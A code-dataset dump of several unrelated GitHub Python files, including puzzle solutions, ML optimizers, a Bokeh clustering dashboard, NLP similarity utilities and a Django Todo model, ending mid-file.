+{"seq_id":"74458225390","text":"def load_input_file(filename: str) -> str:\n with open(filename) as f:\n out = f.read()\n return out.strip()\n\n\ndef get_unique_chars(input_string: str, length: int) -> str:\n marker = 0\n for i in range(0, len(input_string) - length - 1):\n chars = set(input_string[i:i + length])\n if len(chars) == length:\n marker = i + length\n break\n return input_string[marker:marker + length]\n","repo_name":"Empiire00/advent-of-code-2022","sub_path":"day-6/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39501943423","text":"import os\nimport imageio\nimport taichi as ti\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom yacs.config import CfgNode as CN\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nfrom plb.algorithms.logger import Logger\nfrom .optim import Optimizer\nfrom ..engine.taichi_env import TaichiEnv\nfrom ..config.utils import make_cls_config\n\nAF = {\n \"Tanh\": F.tanh,\n \"ReLU\": F.relu,\n \"LeakyReLU\": F.leaky_relu\n}\n\n\nclass MLP(nn.Module):\n def __init__(self, input_dim, output_dim, hidden=(256, 256), activation=\"Tanh\"):\n super(MLP, self).__init__()\n self.af = AF[activation]\n dims = (input_dim,) + hidden + (output_dim,)\n self.linears = nn.ModuleList(\n [nn.Linear(dim, dims[i+1]) for i, dim in enumerate(dims[:-1])])\n\n def forward(self, x):\n for l in self.linears[:-1]:\n x = self.af(l(x))\n logits = self.linears[-1](x)\n logits = F.hardtanh(logits, -1., 1.)\n return logits\n\n @ classmethod\n def default_config(cls):\n cfg = CN()\n cfg.hidden = (256, 256)\n cfg.af = \"Tanh\"\n return cfg\n\n\nclass SolverTorchNN:\n def __init__(self, env, logger=None, data_dir='', **kwargs):\n self.cfg = make_cls_config(self, None, **kwargs)\n self.env = env\n self.logger = logger\n self.data_dir = data_dir\n # self.device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.device = 'cpu'\n self.nn = MLP(env.observation_space.shape[0], env.action_space.shape[0],\n hidden=self.cfg.nn.hidden, activation=self.cfg.nn.af).double().to(self.device)\n self.learning_rate = self.cfg.optim.lr\n self.optimizer = torch.optim.Adam(\n self.nn.parameters(), lr=self.learning_rate)\n\n def train(self, epoch):\n if self.logger is not None:\n self.logger.reset()\n taichi_env = self.env.unwrapped.taichi_env\n actions = []\n obs = self.env.reset()\n taichi_env.set_copy(False)\n taichi_env.set_torch_nn(self.nn)\n with ti.Tape(loss=taichi_env.loss.loss):\n for i in range(self.cfg.horizon):\n action = taichi_env.act(obs) # Need to be wrapped\n #action_np = action.data.cpu().numpy()\n obs, reward, done, loss_info = self.env.step(action)\n\n if self.logger is not None:\n self.logger.step(\n None, None, reward, None, i == self.cfg.horizon-1, loss_info)\n loss = taichi_env.loss.loss[None]\n\n self.logger.summary_writer.writer.add_histogram(\n 'output layer grad', self.nn.linears[2].weight.grad, epoch)\n\n self.optimizer.step()\n actions_np = [t.data.cpu().numpy() for t in actions]\n return loss, actions_np\n\n def solve(self, callbacks=()):\n best_actions = None\n best_model = None\n best_loss = 1e10\n for iter in range(self.cfg.n_iters):\n self.optimizer.zero_grad()\n loss, actions = self.train(iter)\n\n if loss < best_loss:\n best_loss = loss\n best_actions = actions.copy()\n best_model = self.nn.state_dict().copy()\n\n for callback in callbacks:\n callback(loss, actions)\n\n torch.save(best_model, os.path.join(\n self.data_dir, 'model_weights.pth'))\n\n self.env.reset()\n # self.logger.summary_writer.writer.add_graph(self.nn)\n self.logger.summary_writer.writer.close()\n return best_actions\n\n def inference(self):\n self.nn.load_state_dict(torch.load(\n os.path.join(self.data_dir, 'model_weights.pth')))\n self.nn.eval()\n actions = []\n obs = self.env.reset()\n for i in range(self.cfg.horizon):\n state_tensor = torch.as_tensor(obs).to(self.device)\n action_var = self.nn(state_tensor)\n actions.append(action_var)\n action_np = action_var.data.cpu().clone().numpy()\n obs, reward, done, loss_info = self.env.step(action_np)\n actions_np = [t.data.cpu().numpy() for t in actions]\n return actions_np\n\n @ classmethod\n def default_config(cls):\n cfg = CN()\n cfg.optim = Optimizer.default_config()\n cfg.nn = MLP.default_config()\n cfg.n_iters = 100\n cfg.softness = 666.\n cfg.horizon = 50\n\n return cfg\n\n\ndef solve_torch_nnv2(env, args):\n import os\n import cv2\n\n T = env._max_episode_steps\n\n nn_name = f\"nnv2_gv-{1.0}\"\n\n exp_name = f\"{nn_name}_{args.env_name}_horizon-{T}_hidden-{args.hidden}_lr-{args.lr}_af-{args.af}\"\n\n path = f\"data/{exp_name}/{exp_name}_s{args.seed}\"\n os.makedirs(path, exist_ok=True)\n logger = Logger(path, exp_name)\n env.reset()\n\n solver = SolverTorchNN(env, logger, data_dir=path,\n n_iters=200,\n softness=args.softness, horizon=T,\n **{\"optim.lr\": args.lr, \"nn.hidden\": args.hidden, \"nn.af\": args.af})\n\n actions = solver.solve()\n # actions = solver.inference()\n\n with imageio.get_writer(f\"{path}/output.gif\", mode=\"I\") as writer:\n for idx, act in enumerate(actions):\n _, reward, _, _ = env.step(act)\n img = env.render(mode='rgb_array')\n img = cv2.resize(img, (0, 0), fx=0.5, fy=0.5)\n writer.append_data(img)\n","repo_name":"fyp21011/PlasticineLab","sub_path":"plb/optimizer/solver_torch_nnv2.py","file_name":"solver_torch_nnv2.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"540072192","text":"\"\"\"This program runs about 1 min, the log scatter looks a very good stright line\n\"\"\"\n\nimport math\nimport sys\nsys.path.append('..')\nimport brfss\nimport myplot\nimport sample_distribution as sd\n\ndef get_sorted_weights():\n resp = brfss.Respondents()\n resp.ReadRecords('..')\n l = [r.weight2 for r in resp.records if r.weight2 != 'NA']\n l.sort()\n return l, len(l)\n\ndef main():\n weights, n = get_sorted_weights()\n xs = sd.samples('normal', n) \n myplot.scatter(xs, weights, label='normal')\n\n log_w = [math.log(w) for w in weights]\n myplot.scatter(xs, log_w, color='red', label='log normal')\n\n myplot.show()\n\nif __name__ == '__main__':\n main()","repo_name":"lloyd-dong/lab","sub_path":"think_stats/excercise/e4_11.py","file_name":"e4_11.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"19874686605","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 12 13:41:53 2021\n\n@author: gabrielpereira\n\"\"\"\n\n\n\nprint('Running check')\n\nimport math\n\n# As factors are found, the list is updated with a new \"large number\" \n# resulting from the division of the previous one by the factor found\nlarge_number = [600851475143]\n\n# Create a list to keep note of the actual divisors of large_number[0]\nsuccessful_divisors = []\n\n# Initialise the divisors to be tested\ntrial_divisor = 2\n\n\nwhile trial_divisor <= math.floor(math.sqrt(large_number[-1])):\n\n if large_number[-1] % trial_divisor == 0:\n large_number.append(large_number[-1]/trial_divisor)\n successful_divisors.append(trial_divisor)\n else:\n trial_divisor += 1 # Only here is the trial updated so that square,... factors can be found\n \nprint(large_number) # Actually the largest factor is the last \"large_number\",\n# as we can't find a factor for it (it's prime), and it's larger than the last successful_divisor\nprint(successful_divisors)","repo_name":"berkpereira/project-euler","sub_path":"euler03.py","file_name":"euler03.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"43524873392","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport functools\n\nfrom tensor2tensor.trax.backend import numpy as np\nfrom tensor2tensor.trax.layers import base as layers\n\n\ndef tree_flatten(tree):\n \"\"\"Flatten a tree into a list.\"\"\"\n if isinstance(tree, (list, tuple)):\n # In python, sum of lists starting from [] is the concatenation.\n return sum([tree_flatten(t) for t in tree], [])\n if isinstance(tree, dict):\n # Only use the values in case of a dictionary node.\n return sum([tree_flatten(v) for v in tree.values()], [])\n return [tree]\n\n\ndef tree_unflatten(flat, tree):\n \"\"\"Unflatten a list into a tree given the tree shape as second argument.\n\n Args:\n flat: a flat list of elements to be assembled into a tree.\n tree: a tree with the structure we want to have in the new tree.\n\n Returns:\n A pair (new_tree, rest_of_flat) where the new tree that has the structure\n of tree but with leaves from flat, and the remaining elements of flat if\n more were provided than the number of leaves of tree (useful for recursion).\n \"\"\"\n if isinstance(tree, (list, tuple)):\n new_tree, rest = [], flat\n for t in tree:\n new_t, rest = tree_unflatten(rest, t)\n new_tree.append(new_t)\n new_tree = tuple(new_tree) if isinstance(tree, tuple) else new_tree\n return new_tree, rest\n if isinstance(tree, dict):\n new_tree, rest = {}, flat\n for k in tree:\n new_v, rest = tree_unflatten(rest, tree[k])\n new_tree[k] = new_v\n return new_tree, rest\n return flat[0], flat[1:]\n\n\nclass Optimizer(object):\n \"\"\"Optimizer object, base class. Maps per-parameter functions to trees.\"\"\"\n\n def __init__(self, learning_rate, *init_opt_params):\n \"\"\"Initialize the optimizer.\n\n Takes the initial optimizer parameters as positional arguments. They are fed\n back to the optimizer in tree_update, in the same order. They can be changed\n between updates, e.g. for learning rate schedules.\n\n The constructor should be overridden in derived classes to give names to the\n optimizer parameters, so the gin configuration can set them.\n\n Args:\n learning_rate: The initial learning rate.\n *init_opt_params: Initial values of any additional optimizer parameters.\n \"\"\"\n self._init_opt_params = tuple(\n map(np.array, (learning_rate,) + init_opt_params))\n\n def init(self, params):\n \"\"\"Create optimizer slots for the given parameters.\"\"\"\n raise NotImplementedError\n\n def update(self, step, grads, params, slots, opt_params):\n \"\"\"Update a single parameter array.\n\n Args:\n step: Current step.\n grads: Gradients.\n params: Parameters.\n slots: Optimizer slots (e.g. gradient moments).\n opt_params: Optimizer (hyper)parameters (e.g. learning rate, momentum).\n\n Returns:\n (new_params, new_slots)\n \"\"\"\n raise NotImplementedError\n\n # End subclass interface.\n\n def tree_init(self, param_tree):\n return (\n [self.init(param) for param in tree_flatten(param_tree)],\n self._init_opt_params,\n )\n\n def _update_and_check(self, step, grads, params, slots, opt_params):\n \"\"\"Update a single parameter array and check types.\"\"\"\n new_params, new_slots = self.update(\n step, grads, params, slots, opt_params)\n if isinstance(params, np.ndarray):\n assert isinstance(new_params, np.ndarray), (\n \"The type of the new parameter values should be np.ndarray; got %s\" %\n type(new_params))\n assert new_params.dtype == params.dtype, (\n \"The dtype of the new parameter values (%s) is not the same as the \"\n \"old one (%s)\" % (new_params.dtype, params.dtype))\n return new_params, new_slots\n\n def tree_update(self, step, grad_tree, param_tree, slots, opt_params):\n grads_flat = tree_flatten(grad_tree)\n params_flat = tree_flatten(param_tree)\n updated_pairs = [\n self._update_and_check(step, grad, param, slot, opt_params)\n for (grad, param, slot) in zip(grads_flat, params_flat, slots)\n ]\n new_params_flat, new_slots = zip(*updated_pairs)\n new_params, _ = tree_unflatten(new_params_flat, param_tree)\n return new_params, new_slots\n\n\n# Utilities.\n\n\ndef l2_norm(tree):\n \"\"\"Compute the l2 norm of a pytree of arrays. Useful for weight decay.\"\"\"\n leaves = tree_flatten(tree)\n return np.sqrt(sum(np.vdot(x, x) for x in leaves))\n\n\ndef clip_grads(grad_tree, max_norm):\n \"\"\"Clip gradients stored as a pytree of arrays to maximum norm `max_norm`.\"\"\"\n norm = l2_norm(grad_tree)\n normalize = lambda g: np.where(norm < max_norm, g, g * (max_norm / norm))\n return layers.nested_map(normalize, grad_tree)\n\n\n# Optimizers.\n\n\nclass SGD(Optimizer):\n \"\"\"Plain SGD optimizer.\"\"\"\n\n def init(self, params):\n return None\n\n def update(self, step, grads, params, slots, opt_params):\n del step\n del slots\n (learning_rate,) = opt_params\n return params - (learning_rate * grads).astype(params.dtype), None\n\n\nclass Momentum(Optimizer):\n \"\"\"Nestrov momentum optimizer.\"\"\"\n\n def __init__(self, learning_rate, mass=0.9): # pylint: disable=useless-super-delegation\n super(Momentum, self).__init__(learning_rate, mass)\n\n def init(self, params):\n return np.zeros_like(params)\n\n def update(self, step, grads, params, velocity, opt_params):\n del step\n (learning_rate, mass) = opt_params\n new_velocity = mass * velocity - (1. - mass) * grads\n new_params = params + (learning_rate * new_velocity).astype(params.dtype)\n return (new_params, new_velocity)\n\n\nclass RMSProp(Optimizer):\n \"\"\"RMSProp optimizer.\"\"\"\n\n def __init__(self, learning_rate, gamma=0.9, eps=1e-8): # pylint: disable=useless-super-delegation\n super(RMSProp, self).__init__(learning_rate, gamma, eps)\n\n def init(self, params):\n return np.ones_like(params)\n\n def update(self, step, grads, params, avg_sq_grad, opt_params):\n del step\n (learning_rate, gamma, eps) = opt_params\n avg_sq_grad = avg_sq_grad * gamma + grads**2 * (1. - gamma)\n params = params - (learning_rate * grads /\n (np.sqrt(avg_sq_grad) + eps)).astype(params.dtype)\n return params, avg_sq_grad\n\n\nclass Adam(Optimizer):\n \"\"\"Adam optimizer.\"\"\"\n\n def __init__(self, learning_rate, b1=0.9, b2=0.999, eps=1e-8): # pylint: disable=useless-super-delegation\n \"\"\"Create the Adam optimizer.\n\n Args:\n learning_rate: a postitive scalar value for the initial learning rate.\n b1: optional, a positive scalar value for beta_1, the exponential decay\n rate for the first moment estimates (default 0.9).\n b2: optional, a positive scalar value for beta_2, the exponential decay\n rate for the second moment estimates (default 0.999).\n eps: optional, a positive scalar value for epsilon, a small constant for\n numerical stability (default 1e-8).\n \"\"\"\n super(Adam, self).__init__(learning_rate, b1, b2, eps)\n\n def init(self, params):\n m = np.zeros_like(params)\n v = np.zeros_like(params)\n return m, v\n\n def update(self, step, grads, params, slots, opt_params):\n m, v = slots\n learning_rate, b1, b2, eps = opt_params\n m = (1 - b1) * grads + b1 * m # First moment estimate.\n v = (1 - b2) * (grads ** 2) + b2 * v # Second moment estimate.\n mhat = m / (1 - b1 ** (step + 1)) # Bias correction.\n vhat = v / (1 - b2 ** (step + 1))\n params = params - (\n learning_rate * mhat / (np.sqrt(vhat) + eps)).astype(params.dtype)\n return params, (m, v)\n\n\nclass Adafactor(Optimizer):\n \"\"\"Adafactor optimizer.\"\"\"\n\n # TODO(levskaya): refactor to use newer RL friendly parameter passing.\n def __init__(self,\n learning_rate,\n decay_rate=0.8,\n beta1=0.0,\n clipping_threshold=1.0,\n factored=True,\n multiply_by_parameter_scale=True,\n epsilon1=1e-30,\n epsilon2=1e-3):\n \"\"\"Create the Adafactor optimizer.\n\n Adafactor is described in https://arxiv.org/abs/1804.04235.\n\n Args:\n learning_rate: float: trax-provided learning rate.\n decay_rate: float: controls second-moment exponential decay schedule.\n beta1: a float value between 0 and 1, enables momentum and uses extra\n memory if nonzero! Off by default.\n clipping_threshold: an optional float >= 1, if None no update clipping.\n factored: boolean: whether to use factored second-moment estimator for 2d\n variables.\n multiply_by_parameter_scale: boolean: if True, then scale provided\n learning_rate by parameter norm. if False, provided learning_rate is\n absolute step size.\n epsilon1: Regularization constant for squared gradient.\n epsilon2: Regularization constant for parameter scale.\n \"\"\"\n super(Adafactor, self).__init__(learning_rate)\n self._multiply_by_parameter_scale = multiply_by_parameter_scale\n self._factored = factored\n self._beta1 = beta1\n self._clipping_threshold = clipping_threshold\n self._epsilon1 = epsilon1\n self._epsilon2 = epsilon2\n self._decay_rate = functools.partial(self._decay_rate_pow,\n exponent=decay_rate)\n\n @staticmethod\n def _decay_rate_pow(i, exponent=0.8):\n \"\"\"Default Adafactor second-moment decay schedule.\"\"\"\n t = np.array(i, np.float32) + 1.0\n return 1.0 - t**(-exponent)\n\n def init(self, params):\n shape = params.shape\n slots = []\n if self._factored and len(shape) >= 2:\n v_row = np.zeros(shape[:-1], dtype=np.float32)\n v_col = np.zeros(shape[:-2] + shape[-1:], dtype=np.float32)\n slots.extend([v_row, v_col])\n else:\n v = np.zeros_like(params)\n slots.append(v)\n if self._beta1:\n m = np.zeros_like(params)\n slots.append(m)\n return slots\n\n def update(self, step, grads, params, slots, opt_params):\n updates = []\n (learning_rate,) = opt_params\n decay_rate = self._decay_rate(step)\n update_scale = learning_rate\n if self._multiply_by_parameter_scale:\n update_scale *= np.maximum(\n np.sqrt(np.mean(params * params)), self._epsilon2)\n mixing_rate = 1.0 - decay_rate\n\n grads_sqr = grads * grads + self._epsilon1\n if self._factored and len(params.shape) >= 2:\n v_row = slots.pop(0)\n v_col = slots.pop(0)\n new_v_row = decay_rate * v_row + mixing_rate * np.mean(grads_sqr, axis=-1)\n new_v_col = decay_rate * v_col + mixing_rate * np.mean(grads_sqr, axis=-2)\n updates.extend([new_v_row, new_v_col])\n row_col_mean = np.mean(new_v_row, axis=-1, keepdims=True)\n row_factor = (new_v_row / row_col_mean)**-0.5\n col_factor = (new_v_col)**-0.5\n y = (\n grads * np.expand_dims(row_factor, axis=-1) *\n np.expand_dims(col_factor, axis=-2))\n else:\n v = slots.pop(0)\n new_v = decay_rate * v + mixing_rate * grads_sqr\n updates.append(new_v)\n y = grads * (new_v)**-0.5\n\n if self._clipping_threshold:\n clipping_denom = (\n np.maximum(1.0,\n np.sqrt(np.mean(y * y)) / self._clipping_threshold))\n y /= clipping_denom\n\n subtrahend = update_scale * y\n if self._beta1:\n m = slots.pop(0)\n new_m = self._beta1 * m + (1.0 - self._beta1) * subtrahend\n subtrahend = new_m\n updates.append(new_m)\n\n new_params = params - subtrahend\n return new_params, updates\n\n\nclass SM3(Optimizer):\n \"\"\"SM3 optimizer.\"\"\"\n\n def __init__(self, learning_rate, momentum=0.9): # pylint: disable=useless-super-delegation\n \"\"\"Create the SM3 optimizer.\n\n Memory-Efficient Adaptive Optimization for Large-Scale Learning.\n https://arxiv.org/abs/1901.11150\n\n Args:\n learning_rate: a postitive scalar value for the initial learning rate.\n momentum: optional, a positive scalar value for momentum\n \"\"\"\n super(SM3, self).__init__(learning_rate, momentum)\n\n def init(self, params):\n vs = [np.zeros(sz, dtype=params.dtype) for sz in params.shape]\n return (np.zeros_like(params), vs)\n\n def _update_diagonal(self, grads, params, m, v, opt_params):\n (learning_rate, momentum) = opt_params\n v[0] += grads * grads\n preconditioner = np.where(v[0] > 0, 1.0 / np.sqrt(v[0]),\n np.zeros_like(v[0]))\n preconditioned_grads = preconditioner * grads\n m = (1 - momentum) * preconditioned_grads + momentum * m\n params = params - (learning_rate * m).astype(params.dtype)\n return params, (m, v)\n\n def _expanded_shape(self, shape, axis):\n # Replaces a `shape` of [M, N, K] with 1 in all dimensions except for i.\n # For eg: i = 1 returns [1, N, 1].\n rank = len(shape)\n return [1] * axis + [shape[axis]] + [1] * (rank - axis - 1)\n\n def _minimum(self, tensor_list):\n minimum = tensor_list[0]\n for i in range(1, len(tensor_list)):\n minimum = np.minimum(minimum, tensor_list[i])\n return minimum\n\n def _update_sketched(self, grads, params, m, v, opt_params):\n \"\"\"Update for higher-rank parameters.\"\"\"\n (learning_rate, momentum) = opt_params\n shape = params.shape\n rank = len(shape)\n reshaped_accumulators = [np.reshape(v[i], self._expanded_shape(shape, i))\n for i in range(rank)]\n current_accumulator = self._minimum(reshaped_accumulators)\n current_accumulator += grads * grads\n accumulator_inv_sqrt = np.where(current_accumulator > 0.0,\n 1.0 / np.sqrt(current_accumulator),\n np.zeros_like(current_accumulator))\n preconditioned_gradient = grads * accumulator_inv_sqrt\n m = (1.0 - momentum) * preconditioned_gradient + momentum * m\n params = params - (learning_rate * m).astype(params.dtype)\n for i in range(len(v)):\n axes = list(range(int(i))) + list(range(int(i) + 1, rank))\n dim_accumulator = np.amax(current_accumulator, axis=axes)\n v[i] = dim_accumulator\n return params, (m, v)\n\n def update(self, step, grads, params, slots, opt_params):\n del step\n m, v = slots\n shape = params.shape\n rank = len(shape)\n if rank > 1:\n return self._update_sketched(grads, params, m, v, opt_params)\n else:\n return self._update_diagonal(grads, params, m, v, opt_params)\n","repo_name":"SannyZhou/GEC-t2t","sub_path":"tensor2tensor/trax/optimizers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14179,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"41289841098","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n\nimport pandas as pd\nfrom os.path import dirname, join\nfrom bokeh.io import curdoc\nfrom bokeh.plotting import figure\nfrom bokeh.models import (\n ColumnDataSource, Slider, NumeralTickFormatter, HoverTool\n)\nfrom bokeh.layouts import column, row, widgetbox\nfrom bokeh.models.widgets import (\n Select, Div, Panel, Tabs, NumberFormatter\n)\nfrom sklearn.cluster import KMeans, SpectralClustering\n\n\ndef nix(val, lst):\n return [x for x in lst if x != val]\n\ndef get_data(t1, t2, alg, reg, clusters):\n \"\"\" Get the data according to user's settings.\n\n Args:\n t1: the selected column for x axis\n t2: the selected column for y axis\n alg: the clustering algorithm\n reg: the region for filtered plot\n clusters: the number of clusters for the clustering algorithm\n\n \"\"\"\n \n # Run K-means clustering\n if alg == METHODS[0]:\n labels, centroids = run_Kmeans(data, clusters)\n\n # For K-means clustering, plot the centroid of each cluster\n number = ['Cluster ' + str(i+1) for i in range(clusters)]\n x = [coord[columns.index(t1)] for coord in centroids]\n y = [coord[columns.index(t2)] for coord in centroids]\n d3 = dict(index=number, x=x, y=y, color=COLORS[:clusters])\n \n # Run Spectral clustering\n elif alg == METHODS[1]:\n # Run the normalized data for the affinity matrix\n labels = run_SpectralClustering(data_norm, clusters)\n d3 = dict(index=[], x=[], y=[], color=[])\n\n indices = list(df.index)\n colors = [COLORS[x] for x in labels]\n d1 = dict(index=indices, x=df[t1], y=df[t2], color=colors)\n\n region_df = df.loc[lambda df: df.Region == int(reg), :]\n region_indices = list(region_df.index)\n region_colors = [colors[x] for x in region_indices]\n d2 = dict(index=region_indices, x=region_df[t1], y=region_df[t2], color=region_colors)\n\n return d1, d2, d3\n\ndef run_Kmeans(data, clusters):\n estimator = KMeans(n_clusters=clusters, random_state=0).fit(data)\n return estimator.labels_, estimator.cluster_centers_\n\ndef run_SpectralClustering(data, clusters):\n estimator = SpectralClustering(n_clusters=clusters).fit(data)\n return estimator.labels_\n\n\n# Read in dataset\ndf = pd.read_csv(join(dirname(__file__), 'data/Wholesale customers data.csv'))\ncolumns = sorted(df.columns[2:])\ndata = df[columns].as_matrix()\n\n# Normalize each column (for Spectral Clustering)\ndf_norm = (df - df.min()) / (df.max() - df.min())\ndata_norm = df_norm[columns].as_matrix()\n\n# Set the DataSource for the plots\ns1 = ColumnDataSource(data=dict(index=[], x=[], y=[], color=[]))\ns2 = ColumnDataSource(data=dict(index=[], x=[], y=[], color=[]))\ns3 = ColumnDataSource(data=dict(index=[], x=[], y=[], color=[]))\n\n\n# Default settings\nDEFAULT_TICKERS = columns\nMETHODS = ['K-means', 'Spectral']\nDEFALUT_TOOLS = ['pan', 'box_zoom', 'reset']\nCOLORS = ['#ae254a', '#007380', '#4364ae', '#f9d500',\n '#ff7256', '#800080', '#0e2f44', '#f442cb']\nPLOT_PARAM = {'plot_height': 400, 'plot_width': 600, 'responsive': True,\n 'toolbar_location': 'above', 'tools': DEFALUT_TOOLS}\n\n# Draw an interactive scatter plot to show the data distribution\np1 = figure(**PLOT_PARAM)\np1.circle('x', 'y', source=s1, size=12, color='color', alpha=0.6)\np1.circle_x('x', 'y', source=s3, size=20, color='color', fill_alpha=1.0, line_color='black', line_width=2)\np1.title.text_font_size='16px'\np1.xaxis.formatter=p1.yaxis.formatter=NumeralTickFormatter(format='$ 0,0')\n\np2 = figure(x_range=p1.x_range, y_range=p1.y_range, **PLOT_PARAM)\np2.circle('x', 'y', source=s2, size=12, color='color', alpha=0.6)\np2.title.text_font_size='16px'\np2.xaxis.formatter=p2.yaxis.formatter=NumeralTickFormatter(format='$ 0,0')\n\n# Add a hover tool to the scatter plot\nhover = HoverTool(\n tooltips=[\n ('Index: ', '@index'),\n ('x: ', '@x{$ 0,0}'),\n ('y: ', '@y{$ 0,0}')\n ]\n)\np1.add_tools(hover)\np2.add_tools(hover)\n\n\n# Set up widgets\nx_ticker = Select(title='X Axis:', value='Milk', options=nix('Fresh', DEFAULT_TICKERS))\ny_ticker = Select(title='Y Axis:', value='Fresh', options=nix('Milk', DEFAULT_TICKERS))\nalg_ticker = Select(title='Clustering:', value='K-means', options=METHODS)\nreg_ticker = Select(title='Region:', value='1', options=['1', '2', '3'])\ncluster_slider = Slider(title='Clusters', value=4, start=1, end=8, step=1)\n\n\n# Set up callbacks\ndef x_ticker_change(attrname, old, new):\n y_ticker.options = nix(new, DEFAULT_TICKERS)\n update()\n\ndef y_ticker_change(attrname, old, new):\n x_ticker.options = nix(new, DEFAULT_TICKERS)\n update()\n\ndef setting_change(attrname, old, new):\n update()\n\ndef update():\n t1, t2, t3, t4 = x_ticker.value, y_ticker.value, alg_ticker.value, reg_ticker.value\n clusters = cluster_slider.value\n\n s1.data, s2.data, s3.data = get_data(t1, t2, t3, t4, clusters)\n p1.xaxis.axis_label = p2.xaxis.axis_label = t1 + ' (m.u.)'\n p1.yaxis.axis_label = p2.yaxis.axis_label = t2 + ' (m.u.)'\n p1.title.text = '%s vs. %s' % (t1, t2)\n p2.title.text = 'Region {} only'.format(t4)\n\n\nx_ticker.on_change('value', x_ticker_change)\ny_ticker.on_change('value', y_ticker_change)\nalg_ticker.on_change('value', setting_change)\nreg_ticker.on_change('value', setting_change)\ncluster_slider.on_change('value', setting_change)\n\n\n# Set up layout\ndesc = Div(text=open(join(dirname(__file__), 'description.html')).read(), width=700, height=120)\ntickers = widgetbox(x_ticker, y_ticker, alg_ticker)\np1_widget = row(p1, column(tickers, cluster_slider))\np2_widget = row(p2, reg_ticker)\nscatter_widget = column(p1_widget, p2_widget)\ntab1 = Panel(child=scatter_widget, title='Scatter')\ntabs = Tabs(tabs=[tab1])\nlayout = column(desc, tabs)\n\n\n# Initialize\nupdate()\n\ncurdoc().add_root(layout)\ncurdoc().title = 'Wholesale Customers'\n","repo_name":"DerekChiangTW/CS690V-Visual-Analytics","sub_path":"HW3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"42812209008","text":"# Importing Libraries\nfrom nltk.cluster.util import cosine_distance\nimport numpy as np\n\n# Function to identify how similar two sentences\ndef sentence_similarity(sent1, sent2, stopwords=None):\n if stopwords is None:\n stopwords = []\n \n sent1 = [w.lower() for w in sent1]\n sent2 = [w.lower() for w in sent2]\n \n all_words = list(set(sent1 + sent2))\n \n vector1 = [0] * len(all_words)\n vector2 = [0] * len(all_words)\n \n # build the vector for the first sentence\n for w in sent1:\n if w in stopwords:\n continue\n vector1[all_words.index(w)] += 1\n \n # build the vector for the second sentence\n for w in sent2:\n if w in stopwords:\n continue\n vector2[all_words.index(w)] += 1\n \n return 1 - cosine_distance(vector1, vector2)\n\n# Function to build similarity matrix for the given text file\ndef build_similarity_matrix(sentences, stop_words):\n # Create an empty similarity matrix\n similarity_matrix = np.zeros((len(sentences), len(sentences)))\n \n for idx1 in range(len(sentences)):\n for idx2 in range(len(sentences)):\n if idx1 == idx2: #ignore if both are same sentences\n continue \n similarity_matrix[idx1][idx2] = sentence_similarity(sentences[idx1], sentences[idx2], stop_words)\n\n return similarity_matrix","repo_name":"JayeshLocharla/18CSC305J-Artificial-Intelligence-Project","sub_path":"utilities/nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"12427459266","text":"from django.db import models\n\nclass Todo(models.Model):\n body = models.CharField(max_length=300)\n created = models.DateTimeField(auto_now_add=True)\n description = models.TextField(blank=True)\n attachment = models.FileField(upload_to='attachments/', null=True, blank=True)\n due_datetime = models.DateTimeField(null=True, blank=True)\n is_completed = models.BooleanField(default=False)\n related_url = models.URLField(blank=True)\n color = models.CharField(max_length=10, blank=True)\n parent = models.ForeignKey('self', on_delete=models.CASCADE, null=True, blank=True)\n repeat_period = models.CharField(max_length=20, blank=True)\n viewed = models.BooleanField(default=False)\n priority = models.PositiveIntegerField(default=1)\n location = models.URLField(blank=True)\n \n def __str__(self):\n return f\"{self.body} - {self.created.strftime('%H:%M %d %B')}\" # created alanını özel bir biçimde gösterme\n \n class Meta:\n ordering = ['-created'] # created'e göre ters sıralama\n ","repo_name":"azizsigar/aziztodos","sub_path":"back/todos/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11571495889","text":"#!/usr/bin/env python\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport sys\n\n\n#python3 modification\n\nif sys.version_info >= (3,0):\n\traw_input = input \n\nclass PointSet(object):\n\t\n\tdef __init__(self,filename,delimeter):\n\t\tself.X = []; self.Y = []; self.Z = []\n\t\t\n\t\tf = open(filename).readlines()\n\t\t\n\t\tfor l in f:\n\t\t\tl = l.split(delimeter)\n\t\t\tself.X.append(float(l[0]))\n\t\t\tself.Y.append(float(l[1]))\n\t\t\tself.Z.append(float(l[2]))\n\n\t\t\t\n\tdef clear_location(self):\n\t\tminX = min(self.X)\n\t\tminY = min(self.Y)\n\t\tminZ = min(self.Z)\n\t\tfor i in range(len(self.X)):\n\t\t\tX[i] -= minX\n\t\t\tY[i] -= minY\n\t\t\tZ[i] -= minZ\n\t\t\n\nfig = plt.figure()\nax = fig.add_subplot(111,projection='3d')\n\nans = raw_input('Enter the file you want to plot (e.g. foo.asc):')\nd = raw_input('Enter the delimeter character: ')\n\np = PointSet(ans,d)\n\n\nax.scatter(p.X,p.Y,p.Z, c='r', 